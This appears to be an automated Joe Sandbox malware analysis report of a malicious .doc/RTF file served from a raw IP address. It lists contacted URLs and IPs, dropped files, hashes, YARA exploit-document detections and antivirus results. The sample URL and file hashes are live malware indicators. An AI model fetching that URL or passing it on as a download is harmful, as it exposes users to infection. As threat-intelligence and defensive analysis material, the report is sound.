                                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/workCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                  high
                                                                  https://api.scheduler.CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://my.microsoftpersonalcontent.comCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://store.office.cn/addinstemplateCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://api.aadrm.comCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                    high
                                                                    https://globaldisco.crm.dynamics.comCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                      high
                                                                      https://messaging.engagement.office.com/CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                        high
                                                                        https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                          high
                                                                          https://dev0-api.acompli.net/autodetectCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://www.odwebp.svc.msCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://api.diagnosticssdf.office.com/v2/feedbackCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                            high
                                                                            https://api.powerbi.com/v1.0/myorg/groupsCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                              high
                                                                              https://web.microsoftstream.com/video/CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                high
                                                                                https://api.addins.store.officeppe.com/addinstemplateCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://graph.windows.netCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                  high
                                                                                  https://dataservice.o365filtering.com/CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://officesetup.getmicrosoftkey.comCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://analysis.windows.net/powerbi/apiCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                    high
                                                                                    https://prod-global-autodetect.acompli.net/autodetectCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://outlook.office365.com/autodiscover/autodiscover.jsonCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                      high
                                                                                      https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                        high
                                                                                        https://consent.config.office.com/consentcheckin/v1.0/consentsCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                          high
                                                                                          https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                            high
                                                                                            https://learningtools.onenote.com/learningtoolsapi/v2.0/GetvoicesCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                              high
                                                                                              https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                high
                                                                                                https://d.docs.live.netCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://ncus.contentsync.CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                  high
                                                                                                  https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                    high
                                                                                                    http://weather.service.msn.com/data.aspxCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                      high
                                                                                                      https://apis.live.net/v5.0/CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                        high
                                                                                                        https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                          high
                                                                                                          https://messaging.lifecycle.office.com/CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                            high
                                                                                                            https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                              high
                                                                                                              https://pushchannel.1drv.msCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                                high
                                                                                                                https://management.azure.comCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                                  high
                                                                                                                  https://outlook.office365.comCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                                    high
                                                                                                                    https://wus2.contentsync.CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    https://incidents.diagnostics.office.comCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                                      high
                                                                                                                      https://clients.config.office.net/user/v1.0/iosCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                                        high
                                                                                                                        https://make.powerautomate.comCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://insertmedia.bing.office.net/odc/insertmediaCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                                          high
                                                                                                                          https://o365auditrealtimeingestion.manage.office.comCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                                            high
                                                                                                                            https://outlook.office365.com/api/v1.0/me/ActivitiesCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                                              high
                                                                                                                              https://api.office.netCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                                                high
                                                                                                                                https://incidents.diagnosticssdf.office.comCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                                                  high
                                                                                                                                  https://asgsmsproxyapi.azurewebsites.net/CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://clients.config.office.net/user/v1.0/android/policiesCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                                                    high
                                                                                                                                    https://entitlement.diagnostics.office.comCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                                                      high
                                                                                                                                      https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                                                        high
                                                                                                                                        https://substrate.office.com/search/api/v2/initCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                                                          high
                                                                                                                                          https://outlook.office.com/CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                                                            high
                                                                                                                                            https://storage.live.com/clientlogs/uploadlocationCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                                                              high
                                                                                                                                              https://login.windows.localCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://outlook.office365.com/CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                                                                high
                                                                                                                                                https://webshell.suite.office.comCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://substrate.office.com/search/api/v1/SearchHistoryCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://management.azure.com/CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://messaging.lifecycle.office.com/getcustommessage16CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://api.officescripts.microsoftusercontent.com/apiCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://clients.config.office.net/c2r/v1.0/InteractiveInstallationCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://login.windows.net/common/oauth2/authorizeCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                                                                                                              high
                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                              239.255.255.250
                                                                                                                                                              unknownReserved
                                                                                                                                                              unknownunknownfalse
                                                                                                                                                              142.250.203.100
                                                                                                                                                              www.google.comUnited States
                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                              192.3.176.146
                                                                                                                                                              unknownUnited States
                                                                                                                                                              36352AS-COLOCROSSINGUSfalse
                                                                                                                                                              142.250.203.110
                                                                                                                                                              clients.l.google.comUnited States
                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                              142.250.203.109
                                                                                                                                                              accounts.google.comUnited States
                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                              IP
                                                                                                                                                              192.168.2.1
                                                                                                                                                              Joe Sandbox Version:37.1.0 Beryl
                                                                                                                                                              Analysis ID:884007
                                                                                                                                                              Start date and time:2023-06-08 10:42:36 +02:00
                                                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                                                              Overall analysis duration:0h 4m 48s
                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                              Report type:full
                                                                                                                                                              Cookbook file name:browseurl.jbs
                                                                                                                                                              Sample URL:http://192.3.176.146/ic/icicicicicicicicicicicicicic%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23icicicicicicicic.doc
                                                                                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                              Number of analysed new started processes analysed:7
                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                              Technologies:
                                                                                                                                                              • HCA enabled
                                                                                                                                                              • EGA enabled
                                                                                                                                                              • HDC enabled
                                                                                                                                                              • AMSI enabled
                                                                                                                                                              Analysis Mode:default
                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                              Detection:MAL
                                                                                                                                                              Classification:mal56.win@26/13@4/6
                                                                                                                                                              EGA Information:Failed
                                                                                                                                                              HDC Information:Failed
                                                                                                                                                              HCA Information:
                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                              • Number of executed functions: 0
                                                                                                                                                              • Number of non-executed functions: 0
                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 142.250.203.99, 34.104.35.123, 52.109.56.117, 20.25.84.51, 20.126.106.131
                                                                                                                                                              • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, l-ring.msedge.net, edgedl.me.gvt1.com, config.officeapps.live.com, prod.configsvc1.live.com.akadns.net, update.googleapis.com, ctldl.windowsupdate.com, t-ring-fdv2.msedge.net, clientservices.googleapis.com, nexus.officeapps.live.com, officeclient.microsoft.com, k-ring.msedge.net
                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                              No simulations
                                                                                                                                                              No context
                                                                                                                                                              No context
                                                                                                                                                              No context
                                                                                                                                                              No context
                                                                                                                                                              No context
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):155808
                                                                                                                                                              Entropy (8bit):5.351275988506476
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:b+C/FPgfHB7U9guw19Q9DQA+zQak4F77nXmvidlXRjE6LRz6y:GDQ9DQA+zTXWk
                                                                                                                                                              MD5:F646528F4D105994FA3A56F06DAA9C4E
                                                                                                                                                              SHA1:D549EB65AF6F4871DFE2D541212D89EF89A46EA1
                                                                                                                                                              SHA-256:83FB58D56506FD94022970642BFF087875F8061B9F575A69882889AEE8CDD3D9
                                                                                                                                                              SHA-512:E2625AF52F6FFD41D467766E0322A7C741E83B3942A270BCBC081815777DD09330E5E05B6F7150801EC8DC4BD03BADE75F9E27D4A261382675ABF07CDB6C6FE6
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2023-06-08T08:43:33">.. Build: 16.0.16530.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[MAX.ResourceId]" o:authorityUrl="[ADALAuthorityU
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16384
                                                                                                                                                              Entropy (8bit):1.4461085047358075
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:rabWDQpabkIhN4R2LvXVtB9AlAou7y86:ObqQpa4I8Ruvglzu7p6
                                                                                                                                                              MD5:8B3AECB11763A91828C75FB55D577E9B
                                                                                                                                                              SHA1:8D9A5A4914D539188F047B41271B161E5024165E
                                                                                                                                                              SHA-256:B2710283983268638CCB261EBE419C9A31C04EC1B0202AB479A9A5C74EF3D4E9
                                                                                                                                                              SHA-512:4C0AC9920E81EDA7BD5858EC9718D9D522A602A27FD3D4E6E0A7775F84D0A84CBB35A16B9C82018ECFFEAD9363BCB401D592037071FEB5172AB93E996CDD067A
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):10240
                                                                                                                                                              Entropy (8bit):3.531577689506684
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:YzIrP81m2zHaIOScbOPECfu22xbl3zC40Mamc4Gl3i+EGO9mQVZ:YCloHWScyEau22xbeyxf+/ymUZ
                                                                                                                                                              MD5:B49A111093064D8C6021434DCD639CD6
                                                                                                                                                              SHA1:7DE22FCDA47230C8371CC1286006508232A03D14
                                                                                                                                                              SHA-256:889CAD44E77183B8F3507CC7B68A4CB99B359BB765752A27687876CC56C98D87
                                                                                                                                                              SHA-512:E0EEAA7D8A3B971E40EEF000661C89FF5980F226756DC17CBD647A712C5A2AF7ABBD2582DDEDEAF67FBB612846D4DB7DB95C4F654F0EC378F6025E1D0867CED0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:..............3.4.3.9.6.6.9.1.?._.?.[.+.,.>.%.~.>.7./.?.:.?.=.).=.'.:.8.:.-.?.-.;.*...%.2.%.|.5.%.?.$.=.$.7.5._.8.'.,...5.).?.6.?.`.9.:.,.!.[.*.0.?.+.!.^.^./.?.9.?.~.:.[._.=...2.8.1.0.|.:.)._.-.`...]._.0.8./.~.;.:.`.3.7.8.&.%.@.7.!...+.4.^.2.`.6.0.5.<.2.+.~.#...?.=.?...+.@.9.:.6.~.8.....-.3.[.].?.^.:.%.?.[.-.^.@.+.%.0._.`...%.&.,.%.>.;._.>.~.)...).~.:./.2...4.?.3.@.|.;._.#._.|.4.*.+.9._...).^.~.7.@.9.?.@.|.&.5.?...5.,.`.^.;.^.).%.#.6.*.?.6.7.2.?.[.$.%.-.+.?.#.6.1.5.3.8.!.[.6.?.^./.?.|.|.....@.?.!.=.'.3.3.4.*...&.%.%.2.].0...&.3.`.5.<.1.?.:.|.?.8.8.#.?.:.<.3.,.?.?.3.2.?.[.#.3.;.&.0.3.9.?.0.6.5./.0.[.~...4.:._.#.^.1.>.8.-.,.@.?.-.0.4.~.^.~.<.9.0.7.[.^.7.|...<.>.#.3.].|.@.`.?.^./...?.7.'.>.#.#./.5._.`.@.(.2.?.?.`.|.+.?.=.`.:...?.7.:.?.?.?.?._.%...2.:.?.).@.%.].$.+.?.$.8.).?.0.5.?.(.!./.4.:...&.~.>.?...?.'.7.7...[.6.?.#.;.[.'.[.%.%._./.7.2.).(.!.3.7.|.~.5.3.+.9.<.).?.2.?.?.-.%.).0.<.|.*.?.[.?.3.<.(.?.`.7...;.?.&.?.'.].;.?.].,.=...3._.).;.#.......:.=.%.8.%...-...|.'..._.5.:.:.<.#.8.#.>.*...
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1024
                                                                                                                                                              Entropy (8bit):0.05390218305374581
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Jun 8 16:43:31 2023, mtime=Thu Jun 8 16:43:33 2023, atime=Thu Jun 8 16:43:32 2023, length=23389, window=hide
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1362
                                                                                                                                                              Entropy (8bit):4.453082207117603
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:8NIPbkKUx6CHi2+noDsiUgZFShqpptiAjAEg/6fcNUdDPT4t2Y+xIBjKZm:8mpv8FShqbXAEgJWl7aB6m
                                                                                                                                                              MD5:9D72C24344CDE638BAF414F40320F0B4
                                                                                                                                                              SHA1:56F0AA0B8E9FB591B15A1679ACC3BAE3394E1555
                                                                                                                                                              SHA-256:BEC9CA3707FBDCA5D41EAA022102DC7350EF4CAF0B9B46DDDE6DE4FDB754F1A8
                                                                                                                                                              SHA-512:743F4274294E44B0FD82A6C59CAAD3552A40702A6829C023498B5804FAEA175D4C5D1E09A068F81BE04916EF26DDCB7A583D39ED93749BB1E56C11F091D4DB14
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:L..................F.... ......0.....0....O).0...][......................]....P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L...Vh.....................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1......U....user..>.......NM..Vh......S....................5...a.l.f.o.n.s.......1......Vq...DOWNLO~1..l.......NM..Vq......Y..............B.........D.o.w.n.l.o.a.d.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.8.......2.][...Vq. .ICICIC~1.DOC..........Vp..Vq......[....................{...i.c.i.c.i.c.i.c.i.c.i.c.i.c.i.c.i.c.i.c.i.c.i.c.i.c.i.c.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.i.c.i.c.i.c.i.c.i.c.i.c.i.c.i.c...d.o.c.......................-...................>.S......C:\Users\user\Downloads\icicicicicicicicicicicicicic########################icicicicicicicic.doc..a.....\.....\.....\.....\.....\.D.o.w.n.l.o.a.d.s.\.i.c.i.c.i.c.i.c.i.c.i.c.i.c.i.c.i.c.i.c.i.c.i.c.i.c.i.c.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.i.c.i.c.i.c.i.c.
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              File Type:Generic INItialization configuration [doc]
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):107
                                                                                                                                                              Entropy (8bit):3.526598947706469
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:bDuMJlUGsaSmX1nMaSv:bCHh3
                                                                                                                                                              MD5:67C1183C1DB6A36B49C9C80C601AA355
                                                                                                                                                              SHA1:5CA848CCBE787BCA8AB5630E2C247CDCF17AE4B7
                                                                                                                                                              SHA-256:FCE6351A75DDD7CF709FADA57E72F3A6F7F60F918CA7D14B99DC9D7FAC46B546
                                                                                                                                                              SHA-512:F2DED85065163B87710066508C2F8C77DED175742EF31EAB89E39CCF6AFBE7882682152513B7EEDE77A8C06F239ACF8E87CA66765923F012301FABD42997F1F7
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:[folders]..Templates.LNK=0..icicicicicicicicicicicicicic.LNK=0..[doc]..icicicicicicicicicicicicicic.LNK=0..
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):162
                                                                                                                                                              Entropy (8bit):2.5545952465522173
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:Rl/ZdMnM/WhdlzeuRBKwytO7U/Z:RtZaLaw57+
                                                                                                                                                              MD5:76A7E48CC687D9E3210C10C853ECBB07
                                                                                                                                                              SHA1:00D5F9680BFDE6FE96A91C3AF1CB20242373A2E1
                                                                                                                                                              SHA-256:11C67672A4CF19260B14E9D4C42E11FC94B8C2256A782EB19A1E19DF490CD50D
                                                                                                                                                              SHA-512:F546C86444C194C303B30B7C87C895A0B02B688014AE2778E422E685993D1B38EA898C9EE65231104D62ABC3B88A4B349BEE279DD0080FAA6A163265454D86B4
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:.pratesh................................................p.r.a.t.e.s.h.........#..x....d.x..l..................'..x.........C..scopenested.....+..x................
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                              Category:modified
                                                                                                                                                              Size (bytes):20
                                                                                                                                                              Entropy (8bit):2.8954618442383215
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:QVNliGn:Q9rn
                                                                                                                                                              MD5:C4F79900719F08A6F11287E3C7991493
                                                                                                                                                              SHA1:754325A769BE6ECCC664002CD8F6BDB0D0B8CA4D
                                                                                                                                                              SHA-256:625CA96CCA65A363CC76429804FF47520B103D2044BA559B11EB02AB7B4D79A8
                                                                                                                                                              SHA-512:0F3C498BC7680B4C9167F790CC0BE6C889354AF703ABF0547F87B78FEB0BAA9F5220691DF511192B36AD9F3F69E547E6D382833E6BC25CDB4CD2191920970C5F
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:..p.r.a.t.e.s.h.....
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:Rich Text Format data, version 1
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):23389
                                                                                                                                                              Entropy (8bit):4.252845509983804
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:kz6mmMVuOpyEiI8XnKevWuykFZKjwiise2RuWEd+RLKoCwvnliuEjTUVbS5JH/0t:k5VAOpmI8XnCuVwwr72YWpRLKoCwvnl/
                                                                                                                                                              MD5:F5879C1BE334D16E12D50DB0FD3C233F
                                                                                                                                                              SHA1:6993EC206A042739FC89D7C001A855E10F3946BD
                                                                                                                                                              SHA-256:16447F7E27DE852783027404F8CCF368ECF8E1EADD47F8E080E6E4819D2203B0
                                                                                                                                                              SHA-512:F199E090686BDEB1FE3DE27EEC4E3D83D5ECE18963EF33CE3D03D0A64C9E101E10E41BFAF3FA4127171A699671ABA455A3377741166724F2FC4D9201B70EED7D
                                                                                                                                                              Malicious:true
                                                                                                                                                              Yara Hits:
                                                                                                                                                              • Rule: SUSP_INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embedding one of the object mostly observed in exploit (e.g. CVE-2017-11882) documents., Source: C:\Users\user\Downloads\4e186edb-433c-401c-ba00-d3d21353fa91.tmp, Author: ditekSHen
                                                                                                                                                              • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\Downloads\4e186edb-433c-401c-ba00-d3d21353fa91.tmp, Author: ditekSHen
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                              Reputation:low
